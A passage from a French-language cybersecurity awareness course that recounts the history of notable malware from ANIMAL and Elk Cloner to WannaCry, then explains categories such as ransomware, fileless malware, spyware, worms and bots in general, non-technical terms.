Lorsqu'ANIMAL est exécuté, il pose vingt questions pour obtenir des indices et tente de deviner un animal auquel l'utilisateur pense. ANIMAL recherche les répertoires auxquels l'utilisateur actuel a accès. Si le répertoire ne contient pas une version à jour d'Animal, il se copiera dans ce répertoire. Il écrasera toute ancienne version d'Animal, mais prendra soin de ne pas supprimer d'autres programmes.

Le créateur d'ANIMAL, [**John Walker**](https://www.fourmilab.ch/), a lâché le programme à San Francisco, et après environ une semaine, il était à Washington DC.

![](/files/z2OWVzi86jXV8ZFC0XUF)

Il est peu probable qu'Animal ait causé des dommages mesurables. Le programme ne contenait aucun code délibérément malveillant et n'a même pas exploité de vulnérabilité du système. Il a même pris soin de n'affecter aucun des programmes de l'utilisateur.

### 1982 - ELK CLONER

L'utilisation répandue des ordinateurs Apple II a prédéterminé le destin de cette machine en attirant l'attention des auteurs de virus. Il n'est pas surprenant que la première épidémie de virus informatiques à grande échelle de l'histoire se soit produite sur la plate-forme Apple II.

**Elk Cloner** a été créé par [**Rich Skrenta**](https://en.wikipedia.org/wiki/Rich_Skrenta) pour faire une farce en **1982**. Skrenta avait déjà une réputation de farceur parmi ses amis car, en partageant des jeux et des logiciels informatiques, il modifiait souvent les disquettes pour qu'elles s'éteignent ou affichent des messages moqueurs à l'écran.&#x20;

**Elk Cloner** s'est propagé en infectant le système d'exploitation de l'Apple II, stocké sur des disquettes. Lorsque l'ordinateur était démarré à partir d'une disquette infectée, une copie du virus démarrait automatiquement. Le virus n'affectait normalement pas le fonctionnement de l'ordinateur, sauf pour surveiller l'accès au disque. En cas d'accès à une disquette non infectée, le virus se copiait sur la disquette et l'infectait également, se propageant lentement de disquette en disquette.

Le virus **Elk Cloner** a infecté le secteur de démarrage des ordinateurs Apple II. À l'époque, les systèmes d'exploitation étaient stockés sur des disquettes : les disquettes étaient donc infectées et le virus était lancé à chaque démarrage de la machine. Les utilisateurs étaient surpris par les effets secondaires et infectaient souvent leurs amis en partageant leurs disquettes, car la plupart des gens n'avaient aucune idée de ce qu'étaient les virus et encore moins de leur mode de propagation.

La virus d'Elk Cloner comprenait des images en rotation, du texte clignotant et des messages humoristiques sous forme de poème:&#x20;

![](/files/bT3qSoZJ24OzB1BDVLeI)

Le message disait:&#x20;

> ELK CLONER  (**Définition**: Quelqu'un qui crée des clones) :&#x20;
>
> LE PROGRAMME AVEC UNE PERSONNALITÉ
>
> IL S'INSTALLERA SUR TOUS VOS DISQUES&#x20;
>
> IL S'INFILTRERA DANS VOS PUCES&#x20;
>
> OUI C'EST UN CLONER !
>
> IL VA SE FIXER SUR VOUS COMME DE LA COLLE
>
> IL MODIFIERA AUSSI LA RAM&#x20;
>
> ENVOYEZ LE CLONER !

### 1983 - VIRUS&#x20;

En 1983, le terme "**virus**" a été inventé pour la première fois par [**Frederick Cohen**](https://en.wikipedia.org/wiki/Fred_Cohen) (appelé aussi Fred Cohen) et son collègue [**Leonard Adleman**](https://en.wikipedia.org/wiki/Leonard_Adleman) (appelé aussi Len Adleman) pour décrire des programmes auto-répliqués.

Frederick Cohen, un étudiant diplômé de l'Université de Californie du Sud, donne un aperçu de l'avenir numérique en faisant la démonstration d'un virus informatique lors d'un séminaire sur la sécurité à l'Université Lehigh en Pennsylvanie.

Cohen a inséré son code de validation dans une commande Unix et, cinq minutes après l'avoir lancé sur un ordinateur central, il a pris le contrôle du système. Dans quatre autres démonstrations, le code a réussi à prendre le contrôle en une demi-heure en moyenne, en contournant tous les mécanismes de sécurité en vigueur à l'époque. C'est le conseiller académique de Cohen, Len Adleman (le A du[ **chiffrement RSA**](https://fr.wikipedia.org/wiki/Chiffrement_RSA)), qui a comparé le programme autoréplicatif à un virus, inventant ainsi le terme.&#x20;

{% hint style="success" %}
**Il définit un "virus" comme "un programme qui peut "infecter" d'autres programmes en les modifiant pour y inclure une copie éventuellement évoluée de lui-même".**
{% endhint %}

### 1986 - Brain

**BBRAIN** est considéré comme le premier virus pour PC (IBM **P**ersonal **C**omputer) et a été à l'origine de la première épidémie de virus pour PC. Écrit par deux frères de Lahore au Pakistan **Amjat Farooq Alvi** et **Basit Farooq Alvi,** Brain a touché les secteurs du démarrage, s'est largement répandu dans le monde et a marqué le début de l'ère moderne des virus dans l'informatique. Les auteurs nient, et continuent de nier, toute intention malveillante, affirmant qu'ils n'ont visé que les personnes qui avaient elles-mêmes violé les droits d'auteur des frères sur leur logiciel médical propriétaire.

Brain déplaçait le secteur de démarrage et le marquait comme mauvais, remplaçant le secteur de démarrage original par son propre code. Il se propageait lui-même lorsqu'une nouvelle disquette était insérée dans une machine infectée et affichait un message qui contenait même les coordonnées des auteurs:

![](/files/Lb5KAZOSsEuxOrlB8SXs)

Le message complet était:&#x20;

> **Welcome to the Dungeon © 1986 Basit & Amjad (pvt) Ltd. BRAIN COMPUTER SERVICES 730 NIZAB BLOCK ALLAMA IQBAL TOWN LAHORE-PAKISTAN PHONE:430791,443248,280530. Beware of this VIRUS…. Contact us for vaccination…………!!**

Et en français:

> Bienvenue au Donjon © 1986 Basit & Amjad (pvt) Ltd. BRAIN COMPUTER SERVICES 730 NIZAB BLOCK ALLAMA IQBAL TOWN LAHORE-PAKISTAN PHONE:430791,443248,280530. Méfiez-vous de ce VIRUS.... Contactez nous pour la vaccination............ !!

Le message indique le noms des auteurs, l'adresse et le numéro de téléphone pour les contacter.

### 1992 - Michelangelo

Le 6 mars 1992, un virus datant d'avant l'ère d'Internet a provoqué ce qui était sans doute la première alerte publique aux logiciels malveillants de l'histoire.&#x20;

Michelangelo est classé comme un virus de secteur d'amorçage, un type de virus qui infecte les secteurs de démarrage des périphériques de stockage, généralement le secteur d'amorçage d'une disquette ou le MBR (Master Boot Record) d'un disque dur.&#x20;

{% hint style="info" %}
**Master Boot Record:**

Le Master Boot Record (MBR, secteur principal de démarrage) est le premier secteur d'un disque dur (et auparavant des disquettes), qui contient des informations permettant d'identifier l'emplacement et le statut d'un système d'exploitation afin de l'amorcer (le charger) dans la mémoire principale ou la mémoire vive (RAM) de l'ordinateur. Le Master Boot Record est parfois appelé «secteur de partition» ou «table de partitions principale», car il inclut une table qui localise chaque partition dans laquelle le disque dur a été formaté.

Définition: [**WHATIS.Techtarget**](https://whatis.techtarget.com/fr/definition/Master-Boot-Record-MBR)
{% endhint %}

Les virus du secteur d'amorçage se propagent principalement par le biais de supports physiques tels que les disquettes ou les clés USB. Ils infectent généralement les ordinateurs qui démarrent à l'aide de disques contenant le logiciel malveillant, s'activant à chaque chargement du périphérique de stockage.

![](/files/jzAkb9l8iCSgaxfKupCQ)

Dans le cas de Michelangelo, une fois que le virus a infecté un ordinateur, il reste inactif jusqu'à une date précise, le 6 mars de chaque année, pour être exact. Le **6 mars**, tout ordinateur infecté par Michelangelo voit les données critiques de son disque de démarrage écrasées, ce qui endommage le disque et le rend inutilisable et les données presque irrécupérables.

Il n'y a aucune référence à l'artiste dans le virus, et il est douteux que le ou les développeurs du virus aient voulu établir un lien entre le virus et l'artiste qui est né le **6 mars** 1475. Le nom a été choisi par des chercheurs qui ont remarqué la coïncidence de la date d'activation. La signification réelle de cette date pour l'auteur est inconnue. Michelangelo est une variante du virus [**Stoned**](https://en.wikipedia.org/wiki/Stoned_\(computer_virus\)), déjà endémique en 1987.

L'auteur de Michelangelo n'a jamais été découvert. Compte tenu de l'époque et de l'absence d'exigences financières, le virus a probablement été écrit pour le plaisir de l'auteur plutôt que pour d'éventuels gains financiers.

À son apogée, le virus Michelangelo a acquis une certaine notoriété pour son impact supposé à grande échelle. Le pionnier de l'antivirus John McAfee a estimé que le logiciel malveillant aurait pu infecter jusqu'à 5 millions d'ordinateurs, ce qui était un chiffre considérable au début des années 90. Les grands médias de l'époque ont repris l'affaire et en ont fait un sujet d'actualité majeur - un incident de sécurité dévastateur qui aurait pu causer des ravages sur les ordinateurs du monde entier. Inutile de dire que la nouvelle a attiré l'attention du public à une époque où la sensibilisation aux logiciels malveillants était encore faible.

Le 6 mars 1992, l'impact de Michelangelo a été différent de ce que l'on attendait. On a constaté que seuls quelques milliers d'ordinateurs avaient été infectés par le virus, ce qui était loin des estimations les plus élevées. En fait, les recherches effectuées après l'alerte ont révélé que d'autres variantes de virus étaient découvertes bien plus fréquemment que Michelangelo.

## Années: 2000 à 2017

### 2000 - ILOVEYOU

ILOVEYOU, parfois appelé LoveLetter ou LoveBug, est un ver informatique qui a attaqué plus de dix millions d'ordinateurs personnels Windows à partir du 5 mai 2000.

Identifiable par sa pièce jointe "LOVE-LETTER-FOR-YOU" et son objet "ILOVEYOU", ILOVEYOU a été l'un des premiers vers à attirer l'attention des médias. C'est également l'un des premiers à avoir atteint un bilan de dommages de plusieurs milliards de dollars, ce qui en fait l'un des virus les plus dangereux.&#x20;

Ce programme a été écrit par deux jeunes programmeurs informatiques philippins, Reonel Ramones et Onel de Guzman, étudiants à l'Université informatique AMA de Makati, aux Philippines.

Il a déclaré que le ver était très facile à créer, grâce à un bogue de Windows 95 qui exécutait le code dans les pièces jointes des courriels lorsque l'utilisateur cliquait dessus. Conçu à l'origine pour fonctionner uniquement à Manille, il a supprimé cette restriction géographique par curiosité, ce qui a permis au ver de se répandre dans le monde entier. De Guzman ne s'attendait pas à cette propagation mondiale.

![Le mail qui contient le malware "ILOVEYOU"](/files/2AsftlfuLUZmM6CNEYIr)

### 2003 - SQL Slammer Worm

Le ver SQL slammer est un virus informatique (techniquement, un ver informatique) qui a provoqué un déni de service sur certains hôtes Internet et a considérablement ralenti le trafic Internet général, à partir de 05:30 UTC le 25 janvier 2003.&#x20;

Il s'est propagé rapidement, infectant la plupart de ses 75 000 victimes en 10 minutes. Bien qu'il soit intitulé "SQL slammer worm", le programme n'utilisait pas le langage SQL ; il exploitait deux bug de dépassement de tampon (buffer overflow dans le produit phare de la base de données SQL Server de Microsoft. Parmi les autres noms, citons W32.SQLExp.Worm, DDOS.SQLP1434.A, le ver Sapphire, SQL\_HEL et W32/SQLSlammer.

![La diffusion du malware SQL SLAMMER](/files/GvkU8W5dw9dCksoS8EtF)

Selon les membres de la NSF, de la DARPA, de Silicon Defense, de Cisco Systems, d'AT\&T, du NIST et de l'ACAA, la stratégie de propagation de SQL SLAMMER repose sur des scans aléatoires: il sélectionne des adresses IP au hasard pour les infecter et finit par trouver tous les hôtes sensibles.&#x20;

Les vers à balayage (scans) aléatoire se propagent initialement de façon exponentielle, mais l'infection rapide de nouveaux hôtes devient moins efficace car le ver consacre plus d'efforts à réessayer les adresses qui sont soit déjà infectées, soit immunisées.&#x20;

### **2004 - Cabir Virus**

Il y a exactement dix ans, nous avons découvert le premier véritable virus écrit pour les smartphones de l'époque (Nokia N-Gage, par exemple). Il s'appelait Cabir et ouvrait un tout nouveau monde aux analystes de logiciels malveillants, aux auteurs de virus et aux utilisateurs ordinaires. Voici quelques faits sur ce logiciel malveillant vieux de dix ans:

* Le logiciel malveillant a été baptisé Cabir en raison de sa ressemblance avec la chaîne de caractères "Caribe" trouvée dans le corps du virus et en l'honneur d'Elena Kabirova, employée de Kaspersky Lab, qui est entrée par hasard dans le laboratoire antimalware pendant la discussion sur le nom.&#x20;
* Cabir s'est propagé parmi les smartphones les plus populaires de 2004 - les appareils Nokia basés sur Symbian.&#x20;
* Le seul canal d'infection était Bluetooth. Il était très facile d'être infecté pendant un trajet, au restaurant, à un concert ou à un événement sportif. L'une des plus grandes infections par Cabir a été détectée pendant la Coupe du monde d'athlétisme qui s'est tenue à Helsinki.&#x20;
* Pour protéger un smartphone de Cabir, il fallait désactiver le Bluetooth ou simplement le mettre en mode "invisible".&#x20;
* Les analystes de Kaspersky Lab ont délibérément recherché deux smartphones Nokia pour étudier le malware dans la nature - ce type d'appareil était considéré comme coûteux en 2004. Depuis lors, Kaspersky Lab achète systématiquement tous les modèles d'appareils mobiles les plus populaires afin de rechercher un malware pour une plateforme donnée.

![](/files/NfZJit3TTe6RWaKMOrA8)

### 2013 - **Cryptolocker ransomware attack**

L'attaque par ransomware CryptoLocker était une cyberattaque utilisant le **ransomware CryptoLocker** qui s'est produite du 5 septembre 2013 à la fin mai 2014.&#x20;

{% hint style="success" %}
**Ransomware:**

Un **ransomware** est un type de logiciel malveillant qui empêche ou limite l'accès des utilisateurs à leur système, soit en verrouillant l'écran du système, soit en verrouillant les fichiers des utilisateurs jusqu'au paiement d'une rançon. Les familles de ransomware plus modernes, regroupées sous le nom de cryptoransomware, cryptent certains types de fichiers sur les systèmes infectés et obligent les utilisateurs à payer la rançon par le biais de certaines méthodes de paiement en ligne pour obtenir une clé de décryptage.

**Définition**: [**TREND MICRO**](https://www.trendmicro.com/vinfo/us/security/definition/ransomware)
{% endhint %}

{% hint style="info" %}
**Un chapitre complet sera développé sur les ransomware.**
{% endhint %}

L'attaque a utilisé un cheval de Troie ciblant les ordinateurs fonctionnant sous Microsoft Windows et aurait été diffusée pour la première fois sur Internet le 5 septembre 2013.

{% hint style="success" %}
**Cheval de Troie**:

Un **cheval de Troie** (*Trojan horse* en anglais) est un type de logiciel malveillant, qui ne doit pas être confondu avec les virus ou autres parasites. Le cheval de Troie est un logiciel en apparence légitime, mais qui contient une fonctionnalité malveillante. Son but est de faire entrer cette fonctionnalité malveillante sur l'ordinateur et de l'installer à l'insu de l'utilisateur.

**Définition**: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/Cheval_de_Troie_\(informatique\))
{% endhint %}

Il s'est propagé par le biais de pièces jointes d'e-mails infectés et d'un botnet [Gameover ZeuS](https://www.kaspersky.fr/blog/gameover-zeus-demantele-et-maintenant/3139/) existant. Lorsqu'il est activé, le programme malveillant chiffre certains types de fichiers stockés sur des disques locaux et des disques réseau montés à l'aide de la cryptographie à clé publique [RSA](https://fr.wikipedia.org/wiki/Chiffrement_RSA), la clé privée n'étant stockée que sur les serveurs de contrôle du programme.&#x20;

![](/files/ZmgTQcpwzuuEPiMc8BYW)

### **2017 – WannaCry Ransomware**

L'attaque par ransomware WannaCry est une cyberattaque mondiale menée en mai 2017 par le crypto-ver WannaCry ransomware, qui a ciblé les ordinateurs exécutant le système d'exploitation Microsoft Windows en chiffrant les données et en exigeant le paiement d'une rançon en crypto-monnaie Bitcoin.&#x20;

**EternalBlue** a été volé et divulgué par un groupe appelé The Shadow Brokers un mois avant l'attaque.&#x20;

{% hint style="success" %}
**ETERNALBLUE**:

EternalBlue est à la fois le nom donné à une série de vulnérabilités logicielles de Microsoft et à l’exploit créé par la NSA en tant qu’outil de cyberattaque. Bien que l’exploit EternalBlue – officiellement nommé MS17-010 par Microsoft – n’affecte que les systèmes d’exploitation Windows, tout ce qui utilise le protocole de partage de fichiers SMBv1 (Server Message Block version 1) risque techniquement d’être la cible de ransomwares et autres cyberattaques.

Définition: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/EternalBlue)
{% endhint %}

{% hint style="info" %}
**Exploit ou code d'exploitation:**

Un exploit ou code d'exploitation est, dans le domaine de la sécurité informatique, un élément de programme permettant à un individu ou à un logiciel malveillant d'exploiter une faille de sécurité informatique dans un système informatique.
{% endhint %}

Alors que Microsoft avait déjà publié des correctifs pour fermer l'exploit, une grande partie de la propagation de WannaCry provenait d'organisations qui n'avaient pas appliqué ces correctifs ou qui utilisaient d'anciens systèmes Windows en fin de vie.&#x20;

Ces correctifs étaient impératifs pour la cybersécurité des entreprises, mais beaucoup n'ont pas été appliqués par ignorance de leur importance. Certains ont invoqué la nécessité d'un fonctionnement 24 heures sur 24 et 7 jours sur 7, l'aversion pour le risque de voir des applications qui fonctionnaient auparavant se briser à cause des changements de correctifs, le manque de personnel ou de temps pour les installer, ou d'autres raisons.

![](/files/YSOgr00bwG98eFkUoJK8)


# Malware - Catégories

Dans ce chapitre, je vais vous présenter les catégories de malware les plus communs. Cette liste étant évidemment exhaustive. :smile:

## Tableau des catégories

<table data-header-hidden><thead><tr><th></th><th width="331.3333333333333"></th><th></th></tr></thead><tbody><tr><td><strong>Types</strong></td><td><strong>Fonctionalité</strong> </td><td><strong>Exemple Réel</strong></td></tr><tr><td><a href="#ransomware"><strong>Ransomware ou Rrançongiciel</strong></a></td><td>Bloque l'accès de la victime aux données jusqu'au paiement de la rançon.</td><td><a href="https://www.trendmicro.com/fr_fr/what-is/ransomware/ryuk-ransomware.html"><strong>RYUK</strong></a></td></tr><tr><td><a href="#fileless-malware"><strong>Fileless Malware</strong></a></td><td>Modifie les fichiers natifs du système d'exploitation.</td><td><a href="https://www.pcrisk.fr/guides-de-suppression/9232-astaroth-trojan"><strong>Astaroth</strong></a></td></tr><tr><td><a href="#spyware"><strong>Spyware</strong></a></td><td>Collecte des informations sur l'activité de l'utilisateur à son insu.</td><td><a href="https://www.kaspersky.fr/resource-center/threats/darkhotel-malware-virus-threat-definition"><strong>DarkHotel</strong></a></td></tr><tr><td><a href="#worms"><strong>Worms</strong></a></td><td>Se réplique automatiquement pour propager l'infection à un réseau.</td><td><a href="https://fr.wikipedia.org/wiki/Stuxnet#:~:text=Stuxnet%20est%20un%20ver%20informatique,d&#x27;enrichissement%20d&#x27;uranium."><strong>Stuxnet</strong></a></td></tr><tr><td><a href="#bots"><strong>Bots</strong></a></td><td>Lance un large éventail d'attaques</td><td><a href="https://www.zdnet.fr/actualites/le-nouveau-malware-d-echobot-est-un-concentre-de-vulnerabilites-39886143.htm"><strong>Echobot</strong></a></td></tr><tr><td><a href="#mobile-malware"><strong>Mobile Malware</strong></a></td><td>Infecte les appareils mobiles</td><td><a href="https://www.phonandroid.com/android-google-decouvre-malware-triada-preinstalle-smartphones.html"><strong>Triada</strong></a></td></tr></tbody></table>

## Ransomware

Les ransomwares ont fait les gros titres tout au long de l'année 2021 et continuent de faire l'actualité en 2022.&#x20;

Vous avez peut-être entendu parler d'attaques contre de grandes entreprises, des organisations ou des agences gouvernementales, ou peut-être avez-vous été victime d'une attaque par ransomware sur votre propre appareil. C'est un problème important et une perspective effrayante que d'avoir tous vos fichiers et toutes vos données pris en otage jusqu'à ce que vous payiez. Si vous souhaitez en savoir plus sur cette menace, lisez ce qui suit pour découvrir les différentes formes de ransomware, comment vous les obtenez, d'où ils viennent, qui ils ciblent et, enfin, ce que vous pouvez faire pour vous en protéger.

Un chapitre est dédié aux[ **attaques par Ransomware**](/french/capsule-1-sensibilisation/malware/malware-ransomware) afin de mieux l'expliquer et s'en protéger un maximum.

## **Fileless Malware**

Les **logiciels malveillants sans fichier** ou **Fileless Malware** sont un type de logiciel malveillant qui utilise des programmes légitimes pour infecter un ordinateur. Ils ne s'appuient pas sur des fichiers et ne laissent aucune empreinte, ce qui les rend difficiles à détecter et à supprimer.&#x20;

Les adversaires modernes connaissent les stratégies utilisées par les organisations pour tenter de bloquer leurs attaques, et ils conçoivent des logiciels malveillants de plus en plus sophistiqués et ciblés pour échapper aux défenses. C'est une course contre la montre, car les techniques de piratage les plus efficaces sont généralement les plus récentes.&#x20;

La notion de code malveillant résidant uniquement en mémoire existait certainement avant le 21e siècle. Pourtant, ce n'est que lorsque le très prolifique ver "[**Code Red**](https://www.numerama.com/cyberguerre/763165-code-red-le-virus-qui-aimait-les-denis-de-service.html#:~:text=Apparu%20en%202001%2C%20le%20ver,attaques%20par%20d%C3%A9ni%20de%20service.)" a laissé sa marque sur Internet en 2001 que le terme "malware sans fichier" est entré dans le langage courant.&#x20;

La première référence publique que j'ai pu trouver remonte à l'été 2001, lorsque [**Kaspersky Labs a publié une annonce citant nul autre qu'Eugene Kaspersky**](https://www.kaspersky.com/about/press-releases/2001_a-new-generation-of--fileless-network-worm-has-unleashed-global-chaos) :&#x20;

> *"Nous prévoyons que dans un avenir très proche, des vers sans fichier comme Code Red deviendront l'une des formes les plus répandues de programmes malveillants, et l'inefficacité d'un antivirus face à une telle menace ne fait qu'inviter au danger."*

Code Red exploitait une vulnérabilité dans les serveurs web Microsoft IIS, restant uniquement dans la mémoire de l'hôte infecté.

Un an et demi plus tard, un autre ver -[ **SQL Slammer**](/french/capsule-1-sensibilisation/malware/malware-evolution#2003-sql-slammer-worm) - s'est répandu comme une traînée de poudre en exploitant une vulnérabilité dans les serveurs Microsoft SQL.&#x20;

#### Fonctionnement

Les attaques par des logiciels malveillants sans fichier utilisent les vulnérabilités existantes pour infecter un système. L'attaquant profite d'un logiciel vulnérable déjà installé sur un ordinateur pour s'infiltrer, prendre le contrôle et mener son attaque. Contrairement aux logiciels malveillants traditionnels, les logiciels malveillants sans fichier n'ont pas besoin d'installer ou de télécharger un logiciel malveillant pour infecter la machine de la victime.

Au lieu de cela, le logiciel malveillant utilise les propres fichiers et services d'un système pour permettre à un attaquant d'accéder à un appareil. Une fois dans le système, l'attaquant peut accéder aux systèmes d'exploitation natifs tels que [**Windows PowerShell**](https://fr.wikipedia.org/wiki/Windows_PowerShell) et [**Windows Management Instrumentation (WMI)**](https://fr.wikipedia.org/wiki/Windows_Management_Instrumentation) pour mener à bien son activité malveillante. Comme de nombreuses technologies de sécurité font confiance à ces utilitaires, les activités malveillantes peuvent facilement passer inaperçues, car les analystes supposent que la plupart des actions sont légitimes.

Les logiciels malveillants sans fichier n'existent que dans la mémoire vive (RAM) d'un ordinateur, ce qui signifie que rien n'est jamais écrit directement sur le disque dur. Ils sont donc plus difficiles à détecter car il n'y a pas de fichiers stockés à analyser par les logiciels de sécurité défensifs. En outre, les équipes de sécurité disposent de peu de preuves matérielles pour enquêter après avoir identifié une violation. Cependant, comme les logiciels malveillants sans fichier s'exécutent dans la mémoire vive de l'ordinateur et ne sont jamais enregistrés de façon permanente sur le disque dur, les attaquants disposent d'une fenêtre d'opportunité plus réduite pour exécuter l'attaque. Lorsqu'un système est redémarré, une attaque utilisant un logiciel malveillant sans fichier doit également être relancée.

#### Processus

![](/files/WGmERSNtfMThJqlbrH1Y)

## **Spyware**

Spyware vient des 2 mots anglais: **Spy** (espionner) et **Malware** et c'est donc un logiciel espion malveillant.

Un logiciel espion est un logiciel au comportement malveillant qui vise à recueillir des informations sur une personne ou une organisation et à les envoyer à une autre entité d'une manière qui nuit à l'utilisateur, par exemple en violant sa vie privée ou en mettant en danger la sécurité de son appareil. Ce comportement peut être présent aussi bien dans les logiciels malveillants que dans les logiciels légitimes. Les sites Web peuvent adopter des comportements d'espionnage comme le suivi du Web. Les dispositifs matériels peuvent également être affectés.

{% hint style="info" %}
Et si le terme "**logiciel espion**" est généralement réservé aux logiciels malveillants, il convient de noter que tous les logiciels qui suivent votre activité sur le Web ne le font pas pour de mauvaises raisons. Certains logiciels de suivi en ligne sont utilisés pour mémoriser vos informations de connexion ou pour personnaliser votre visite sur le site.
{% endhint %}

#### Types de Spyware

![Les 4 types courants de Spyware](/files/vmuNn5e3VO5G4po8TAGm)

Il existe quatre types courants de logiciels espions. Leur fonction va du suivi de l'activité de votre navigateur pour que les spécialistes du marketing puissent cibler vos intérêts, par exemple, à la surveillance de vos frappes au clavier et de presque tout ce que vous faites sur votre appareil. Voici quelques-unes des tactiques uniques que chaque type de logiciel espion utilise pour vous suivre :&#x20;

* Les **logiciels publicitaires** ou **adware** suivent l'historique de votre navigateur et vos téléchargements dans le but de prédire les produits ou services qui vous intéressent. Ils sont utilisés à des fins de marketing.
* Les **chevaux de Troie** ou **Trojans** sont un type de malware déguisé en logiciel légitime. Tout comme le cheval de Troie de la mythologie grecque, un cheval de Troie vous incite à le laisser entrer (ou, plus précisément, à l'installer sur votre appareil), en agissant comme une mise à jour ou un fichier logiciel. Il endommage, perturbe ou vole ensuite vos données.
* Le **pistage Internet** ou **Internet Tracking** est une pratique courante utilisée pour suivre vos activités sur le Web, comme l'historique de navigation et les téléchargements, principalement à des fins de marketing.
* Les **moniteurs système** sont un type de logiciel espion qui peut capturer à peu près tout ce que vous faites sur votre ordinateur. Ils peuvent enregistrer toutes vos frappes au clavier, vos courriels, vos dialogues dans les salons de discussion, les sites Web visités et les programmes exécutés. Les moniteurs système sont souvent déguisés en logiciels gratuits.

## Worms

Un ver informatique, en anglais appelé **WORM**, est un programme informatique malveillant autonome qui se réplique afin de se propager à d'autres ordinateurs.

Le ver utilise souvent un réseau informatique pour se propager, en s'appuyant sur les défaillances de sécurité de l'ordinateur cible pour y accéder. Il utilisera cette machine comme hôte pour analyser et infecter d'autres ordinateurs. Lorsque ces nouveaux ordinateurs envahis par le ver sont contrôlés, il continuera à analyser et à infecter d'autres ordinateurs en utilisant ces ordinateurs comme hôtes, et ce comportement se poursuivra.&#x20;

Les vers informatiques utilisent des méthodes récursives pour se copier sans programme hôte et se distribuer selon la loi de la croissance exponentielle, contrôlant et infectant ainsi de plus en plus d'ordinateurs en peu de temps. Les vers causent presque toujours au moins quelques dommages au réseau, ne serait-ce qu'en consommant de la bande passante, alors que les virus corrompent ou modifient presque toujours les fichiers d'un ordinateur ciblé.

<figure><img src="/files/QNfhqGBpOV6J4cfoNNwb" alt=""><figcaption><p> <em>Les vers peuvent se propager de façon exponentielle et infecter tous les ordinateurs du réseau.</em></p></figcaption></figure>

#### Méthode de propagation

* [**Phishing** ](/french/capsule-1-sensibilisation/phishing): Les courriels frauduleux qui semblent authentiques peuvent contenir des vers dans des pièces jointes corrompues. Ces courriels peuvent également inviter les utilisateurs à cliquer sur des liens malveillants ou à visiter des sites Web conçus pour infecter les utilisateurs avec des vers.&#x20;
* [**Spear-Phishing**](/french/capsule-1-sensibilisation/phishing/phishing-techniques#spear-phishing) : Les tentatives d'hameçonnage ciblées peuvent véhiculer des logiciels malveillants dangereux comme des cryptomonnaies de type ransomware.
* **Les réseaux** : Les vers peuvent s'auto-répliquer sur les réseaux via un accès partagé.&#x20;
* **Failles de sécurité** : Certaines variantes de vers peuvent s'infiltrer dans un système en exploitant des vulnérabilités logicielles.&#x20;
* **Partage de fichiers** : Les réseaux de fichiers [**P2P**](https://fr.wikipedia.org/wiki/Pair-%C3%A0-pair) peuvent transporter des logiciels malveillants comme les vers.&#x20;
* **Les messageries instantanées** (**IM** de l'anglais Instant Messaging) : Tous les types de logiciels malveillants, y compris les vers, peuvent se propager par le biais de messages texte et de plates-formes de messagerie instantanée telles que l'Internet Relay Chat (IRC).
* **Dispositifs externes** : Les vers peuvent infecter les clés USB et les disques durs externes.

#### Objectifs

Une fois qu'un ver informatique a percé les défenses de votre ordinateur, il peut effectuer plusieurs actions malveillantes :

* Déposer d'autres logiciels malveillants comme des logiciels espions ou des rançongiciels.
* Consommer de la bande passante.&#x20;
* Supprimer des fichiers.&#x20;
* Surcharger les réseaux.&#x20;
* Voler des données.&#x20;
* Ouvrir une [**porte dérobée**](https://fr.wikipedia.org/wiki/Porte_d%C3%A9rob%C3%A9e).
* Détruire l'espace du disque dur.

#### Virus VS Worm

La pensée populaire pousse à la croyance qu'un virus et un ver ne forment qu'une seule entité de malware.

Certes le comportement des deux est similaires et leurs objectifs aussi, mais une différence essentielle existe: **les virus dépendent de l'action humaine pour être activés et ont besoin d'un système hôte pour se répliquer**. En d'autres termes, un virus ne peut nuire à votre système que si vous l'exécutez.

Par exemple, un virus présent sur une clé USB connectée à votre ordinateur n'endommagera pas votre système si vous ne l'activez pas. Et comme mentionné ci-dessus, un ver n'a pas besoin d'un système hôte ou d'une action de l'utilisateur pour se propager.

## **Bots**

Un "bot" (abréviation de "robot") est un logiciel qui exécute des tâches automatisées, répétitives et prédéfinies. Les robots imitent ou remplacent généralement le comportement des utilisateurs humains.&#x20;

Comme ils sont automatisés, ils fonctionnent beaucoup plus rapidement que les utilisateurs humains. Ils remplissent des fonctions utiles, comme le service clientèle ou l'indexation des moteurs de recherche, mais ils peuvent aussi se présenter sous la forme de logiciels malveillants - utilisés pour prendre le contrôle total d'un ordinateur.

#### **Différence entre bon et mauvais Bot**

Les bots informatiques et les bots Internet sont essentiellement des outils numériques et, comme tout outil, ils peuvent être utilisés à bon ou mauvais escient.

Les bons bots effectuent des tâches utiles, mais les mauvais bots - également connus sous le nom de bots malveillants - comportent des risques et peuvent être utilisés pour pirater, spammer, espionner, interrompre et compromettre des sites web de toutes tailles. On estime qu'aujourd'hui, jusqu'à la moitié de l'ensemble du trafic internet est constitué de bots informatiques effectuant certaines tâches, comme l'automatisation du service clientèle, la simulation de la communication humaine sur les réseaux sociaux, l'aide aux entreprises pour la recherche de contenu en ligne et l'assistance à l'optimisation des moteurs de recherche.

{% hint style="danger" %}
**Selon "**[**Bad Bot Report**](https://www.imperva.com/resources/resource-library/reports/bad-bot-report/)**" relayé par CPOMagazine dans leur article:** [**Bad Bot Traffic Report**](https://www.cpomagazine.com/cyber-security/bad-bot-traffic-report-almost-half-of-all-2021-internet-traffic-was-not-human/)**, plus de 40% de l'utilisation internet provient de Bots donc 27% de mauvais Bots.**
{% endhint %}

Les organisations ou les particuliers utilisent des bots pour remplacer les tâches répétitives qu'un humain devrait autrement effectuer. Les tâches exécutées par les bots sont généralement simples et réalisées à un rythme beaucoup plus rapide que l'activité humaine.&#x20;

Les tâches exécutées par les robots ne sont pas toutes bénignes - les robots sont parfois utilisés pour des activités criminelles telles que le vol de données, les escroqueries ou les attaques DDoS.

#### **Exemples**

Alors que les robots malveillants créent des problèmes et des enjeux pour les organisations, les dangers pour les consommateurs comprennent leur potentiel pour effectuer des vols de données et d'identité, l'enregistrement au clavier d'informations sensibles telles que les mots de passe, les coordonnées bancaires et les adresses, et le phishing.

Les robots malveillants peuvent facilement passer inaperçus. Ils se cachent facilement dans un ordinateur et ont souvent des noms de fichiers et des processus similaires, voire identiques, à ceux des fichiers ou processus du système ordinaire.

Voici quelques exemples de robots malveillants :&#x20;

* **Spambots**&#x20;

Les spambots peuvent récolter des adresses électroniques à partir de pages de contact ou de livres d'or. Ils peuvent également publier du contenu promotionnel dans des forums ou des sections de commentaires afin d'attirer du trafic vers des sites web spécifiques.

* **Chatterbots malveillants**&#x20;

